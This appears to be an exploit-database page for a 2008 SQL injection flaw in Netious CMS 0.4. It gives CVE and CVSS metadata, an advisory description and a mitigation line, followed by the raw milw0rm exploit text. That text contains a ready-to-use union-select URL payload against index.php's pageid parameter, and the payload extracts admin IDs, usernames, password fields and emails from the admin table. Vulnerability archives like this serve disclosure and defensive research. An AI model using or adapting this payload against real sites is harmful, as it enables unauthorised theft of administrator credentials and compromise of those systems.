header-logo
Suggest Exploit
vendor:
Netious CMS
by:
InjEctOr [s0f (at) w (dot) cn] && ToTaL [n.47 at hotmail.com]
9.3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Netious CMS
Affected Version From: 0.4
Affected Version To: 0.4
Patch Exists: YES
Related CWE: CVE-2008-4456
CPE: a:netious:netious_cms
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Netious CMS 0.4 Remote SQL Injection Vulnerability

Netious CMS 0.4 is prone to a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Upgrade to the latest version of Netious CMS 0.4
Source

Exploit-DB raw data:

                         ||          ||   | ||       
                  o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                 ( :   /    (_)    /           (   .
                   ================================
                      ==========================
                         ====================
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title :: Netious CMS 0.4 Remote SQL Injection Vulnerability
Author :: InjEctOr [s0f (at) w (dot) cn]
&& ToTaL [n.47 at hotmail.com]
discouvred by :: ToTaL
Application :: Netious CMS 0.4
 
Download :: http://www.netious.com/sections/3/files/netious-cms-serv-0.4.zip
 
Dork 1 ::  Not Yet  :P
 
Greets :: Allah , InjEctOr5 TeaM , TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
 
Vulnerability: http://localhost/netious/index.php?pageid='/**/union/**/select/**/1,concat_ws(0x3a3a,AdminId,username,password,adminMail),3+from+mycmsadmin/*
 
-------------------------------------------[End of  context]----------------------------------------

# milw0rm.com [2008-05-21]